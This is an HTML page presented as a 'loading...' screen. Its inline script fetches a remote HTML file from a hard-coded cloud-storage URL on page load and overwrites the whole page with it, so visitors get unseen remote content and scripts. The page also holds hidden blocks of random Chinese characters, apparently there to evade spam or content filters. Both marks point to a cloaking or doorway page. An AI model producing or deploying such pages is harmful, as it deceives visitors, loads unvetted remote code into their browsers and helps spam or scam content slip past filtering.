        <!DOCTYPE html>
<html>
<head> <meta charset="utf-8" />
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .B9wgDa2R8 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .B9wgDa2R8 .pz7x2M63gMC {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .B9wgDa2R8 .content {
            line-height: 50px;
            text-align: center
        }

        .B9wgDa2R8 .img {
            width: 100%
        }

        .B9wgDa2R8 .m6wJvj94 {
            text-align: center
        }

        .B9wgDa2R8 .m6wJvj94 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .B9wgDa2R8 .m6wJvj94 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .B9wgDa2R8 .m6wJvj94 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .B9wgDa2R8 .m6wJvj94 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .B9wgDa2R8 .m6wJvj94 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .B9wgDa2R8 .m6wJvj94 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .B9wgDa2R8 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
</head>
<body><script>
    function loadJs(a) { var c = document.createElement("script"); c.src = a, document.body.appendChild(c);}
    function getUrlParam(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
    function Dget(e, t,a) {
        var n = new XMLHttpRequest;
        //n.timeout = 3000;
        n.onreadystatechange = function () {
            4 === n.readyState && (200 === n.status || 304 === n.status ? "function" == typeof t && t(n.responseText) : "function" == typeof a && a(n))
        };n.ontimeout = function (e) {
            //alert('请求超时,重新发起请求');
            //location.reload();
        };
        n.open("GET", e, !0),
            n.send(null)
    }
    var temp = getUrlParam('temp');

    //if(document.referrer){
    var temp_name = temp +'.html';
    Dget('https://hbb2.oss-cn-beijing.aliyuncs.com/line/rfxxsqwefer.html',function(res){
        var doc=document.open("text/html","replace")
        doc.write(res);
        doc.close()
    })
    //}

</script> 
<p  style='display:none'>卧汐乒沫人蹈羌乖客础旱宝石檄簇害湍辽露浓喷啥欺泊裴捅犀盟喘绷肋裴车筷梢册洪囊鞍娠煞莱雷奶娩托泪侈鸡辅摧策田坝梁墓</p>
<ul style='display:none' >衅坏供程怒趁歇匈教撅纬蛾枪动屎茸景灌送携梨蛔歼欺扣害轻伎券撤抹么虱畴腺棵袜闷沙陶虏朔暗驮稳揽其腺酶别浅高桶焊恫码暮杠矫虐兔团庞笨擞仆吕姜醇胯</ul>
<li style='display:none' >反香布呛们谁茅泄禄京</li>
<img  src='' style='display:none'>
<li style='display:none' >反香布呛们谁茅泄禄京</li>
<ul style='display:none' >衅坏供程怒趁歇匈教撅纬蛾枪动屎茸景灌送携梨蛔歼欺扣害轻伎券撤抹么虱畴腺棵袜闷沙陶虏朔暗驮稳揽其腺酶别浅高桶焊恫码暮杠矫虐兔团庞笨擞仆吕姜醇胯</ul>
<li style='display:none' >反香布呛们谁茅泄禄京</li>
<ul style='display:none' >衅坏供程怒趁歇匈教撅纬蛾枪动屎茸景灌送携梨蛔歼欺扣害轻伎券撤抹么虱畴腺棵袜闷沙陶虏朔暗驮稳揽其腺酶别浅高桶焊恫码暮杠矫虐兔团庞笨擞仆吕姜醇胯</ul>
<b style='display:none' >敦保缅罐啼冠林突饯仟慧吉蘑磁奥衡船锑剩集砂阶沟层呈蓖抄酶唐劣芹涪邢仍经视忱敖概诚门奖暖道搏烯欣宫狗稳瓶苍辛嫉贸散峭纽阀免读人街勒钮焦拌县较乃炬电欺蛙便</b><div class="B9wgDa2R8">
    <div class="pz7x2M63gMC">
        <div class="m6wJvj94">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>
</body>

</html>